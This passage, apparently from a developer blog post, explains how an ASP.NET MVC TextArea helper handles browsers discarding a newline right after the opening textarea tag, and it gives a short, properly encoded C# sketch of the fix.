However, suppose our TextArea helper didn’t factor in the actual behavior browsers exhibit. In that case, you would get the behavior of the second text area, in which “Foo” is still on the first line.

Fortunately, our TextArea helper does factor this in and renders the supplied value on the next line after the textarea tag. In my mind, this is very much an edge case, but it was reported as a bug by someone external a while back. Isn’t HTML fun?! ;)
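If you’re curious how a helper might account for this, here’s a simplified sketch (not the actual MVC source): emit one extra newline right after the opening tag; the browser swallows it, so a leading newline in the supplied value survives.

using System;
using System.Web;

public static class TextAreaSketch
{
  // Simplified illustration; a real helper also handles attributes,
  // model state, and so on.
  public static string TextArea(string name, string value)
  {
    return string.Format(
      "<textarea name=\"{0}\" id=\"{0}\">{1}{2}</textarea>",
      HttpUtility.HtmlAttributeEncode(name),
      Environment.NewLine,              // swallowed by the browser
      HttpUtility.HtmlEncode(value));   // so "\r\nFoo" still lands on line two
  }
}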